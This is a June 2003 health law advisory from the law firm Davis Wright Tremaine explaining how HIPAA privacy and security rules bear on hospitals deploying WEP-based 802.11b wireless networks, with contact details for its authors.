|
HIPAA AND WIFI – REGULATORY TANGLES FOR WIRELESS
HEALTH CARE NETWORKS
By Randy
Gainer, Michael
van Eckhardt, Rebecca
L. Williams, and Richard
D. Marks
[June 2003]
New uses for wireless devices in health care administration, practice
management, and clinical care are heralded almost daily in the health
care press. Wireless networks are being deployed to allow physicians
and nurses to access patient records from central databases while
on rounds, to add observations to the databases and to check on
medications, among a growing number of other functions.
The growing use of wireless networks by health care professionals
presents tremendous challenges to health care IT managers. One of
the fundamental axioms of IT is that there is a tradeoff between
access and security: easier access translates to greater security
risks. True to this axiom, the ease of access that wireless networks
offer is matched by the security challenges those networks present.
Decisions made today about the deployment of wireless local area
networks (WLANs) must take into account the impact of the administrative
simplifications of the Health Insurance Portability and Accountability
Act of 1996 (HIPAA).
HIPAA Requirements
The HIPAA statute requires health plans, health care providers,
and other covered entities to maintain reasonable and appropriate
safeguards to protect individually identifiable health information.
Under the HIPAA privacy rules, a covered entity must have in place
appropriate administrative, technical, and physical safeguards to
protect the privacy of electronic and non-electronic protected health
information. A court asked to determine the meaning of “appropriate
safeguards” under this “mini security rule” may well
refer to the principles and requirements of the security rules to
determine what safeguards an entity should have implemented.
The HIPAA security rules were issued in final form on February
20, 2003. They apply to protected health information in electronic
form only. The core principles of the final rules require covered
entities to: (1) ensure the confidentiality, integrity, and availability
of all electronic protected health information the covered entity
creates, receives, maintains, or transmits; (2) protect against
any reasonably anticipated threats or hazards to the security or
integrity of such information; (3) protect against any reasonably
anticipated uses or disclosures of such information that are not
permitted or required under [the security rules]; and (4) ensure
compliance with the [security rules] by its workforce.
The final security rules offer some flexibility to covered entities
attempting to comply with these requirements, however. For example,
covered entities may use any security measures that allow the covered
entity to reasonably and appropriately implement the standards and
implementation specifications as specified in the security rules.
The requirement that covered entities “ensure” the integrity
and confidentiality of health information against reasonably anticipated
threats or hazards, however, creates a very high legal and practical
standard. The attacks of September 11, 2001, and a number of well
publicized incidents of identity thefts made possible by the theft
of electronic consumer data, may well have raised the bar even higher
regarding what is reasonable and appropriate to protect confidential
information of all kinds.
The penalties for violating HIPAA range from $100 per person per
incident for run-of-the-mill improper disclosures of health information
to $250,000 and 10 years in prison for intentional violations. Statutory
penalties may be the least of a covered entity’s worries, however,
if lax security allows health information to be stolen. There is
also a risk of class action lawsuits and, of course, damage to the
entity’s reputation.
The Security Rules Affect How WLANs Should Be
Implemented
The security rules require covered entities to conduct an assessment
of potential risks and vulnerabilities and to implement—and
revisit from time to time—security measures sufficient to reduce
such risks and vulnerabilities.
If a covered entity assesses the security risks inherent in transmitting
protected health information over wireless networks, it will learn
that well-known technical deficiencies in the security features
of 802.11b technology likely make the technology inadequate, unless
it is enhanced. Required technical safeguards that are not met by
standard 802.11b wireless network security features include the
requirement to implement unique user identification, encryption
and decryption, person and entity authentication, and transmission
security. The main reason that these requirements cannot be satisfied
by deploying only 802.11b technology is that the encryption protocol
used in 802.11b products, called Wired Equivalent Privacy (WEP),
is fundamentally flawed. The deficiencies in WEP have been widely
publicized.
Because the deficiencies in WEP are serious and well-known, a covered
entity risks being deemed to not be in compliance with HIPAA requirements
if it relies on WEP alone to protect the confidentiality and integrity
of data transmitted over wireless networks.
Additionally, covered entities must implement policies and procedures
to safeguard equipment from unauthorized physical access, tampering
and theft. Special attention should be paid to the danger inherent
in the theft of a wireless device that may provide a thief unauthorized
access to protected health information.
Should You Wait to Install or Upgrade Your WLAN?
There are several ways that WLANs are being deployed to make them
more secure. These are discussed in more detail in the full article,
which is available at http://www.dwt.com/practc/hc_ecom/bulletins/05-03_BNAarticle.htm.
Covered health care entities need to consider whether they should
postpone deploying an initial WLAN or upgrading an insecure, WEP-based
WLAN, until planned changes in wireless network standards are adopted
and have been implemented in commercial products. The International
Electrical and Electronics Engineers (IEEE) has announced that it
plans to adopt 802.11g specifications this summer and is working
on the specifications for 802.11i. Some 802.11g products that were
released before the standard is finalized have had inadequate security
features and some 802.11g products have proven not to be compatible
with 802.11b equipment. Presumably 802.11g products developed after
the 802.11g standard is released will not suffer from interoperability
problems. 802.11g networks also will be more secure than 802.11b
networks if they are deployed using the WPA encryption protocol
rather than WEP.
Those who are charged with maintaining the security of health care
information systems carry a heavy burden. As technology changes
constantly, those rules require covered entity managers and their
lawyers to regularly evaluate the impact of those changes on the
security of their networks.
To Review the Article
To review our underlying article, “No Rest for the Wary,”
which was published by BNA's Electronic Commerce & Law Report,
Vol. 8, No. 20 on May 21, 2003, click
here.
For Further Information, Please Contact:
Randy Gainer, Seattle,
(206) 628-7660, randygainer@dwt.com
Rebecca L. Williams,
Seattle, (206) 628-7769, beckywilliams@dwt.com
This Health Law Advisory is a publication
of the Health Law Department of Davis Wright Tremaine LLP. Our purpose
in publishing this Advisory is to inform our clients and friends
of recent developments in health law. It is not intended, nor should
it be used, as a substitute for specific legal advice as legal counsel
may only be given in response to inquiries regarding particular
situations.
Copyright © 2003, Davis Wright
Tremaine LLP.
return to Advisory Bulletins
main page
|
